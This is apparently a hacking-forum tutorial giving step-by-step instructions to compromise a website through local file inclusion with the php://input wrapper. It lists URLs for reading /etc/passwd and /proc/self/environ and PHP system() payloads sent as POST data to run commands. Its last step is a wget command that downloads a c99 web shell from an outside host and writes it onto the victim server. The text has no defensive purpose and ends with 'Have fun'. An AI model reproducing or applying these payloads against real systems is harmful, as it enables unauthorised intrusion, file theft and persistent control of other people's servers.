Today I'll be explaining how to shell a website using "php://input" method via LFI.
So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
 | Click this bar to view the original image of 667x422px. |
Now lets try reading:
Code:
/proc/self/environ /proc/self/fd
Code:
http://www.site.com/index.php?page=/proc/self/environ http://www.site.com/index.php?page=/proc/self/fd
| Click this bar to view the original image of 651x389px. |
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
| Click this bar to view the original image of 686x190px. |
Now let's try putting this method in action.
Look at the picture carefully.
| Click this bar to view the original image of 800x325px. |
URL will be:
Code:
http://www.site.com/index.php?page=php://input
Code:
<? system('uname -a'); ?>
List directories
Code:
<? system('ls'); ?>
Code:
<? system('id'); ?>
Code:
<? system('mv file.txt file.php'); ?>
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
| Click this bar to view the original image of 680x173px. |
Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
Have fun.
Team Intra
If you need any help, feel free to ask me.
0 (mga) komento:
Mag-post ng isang Komento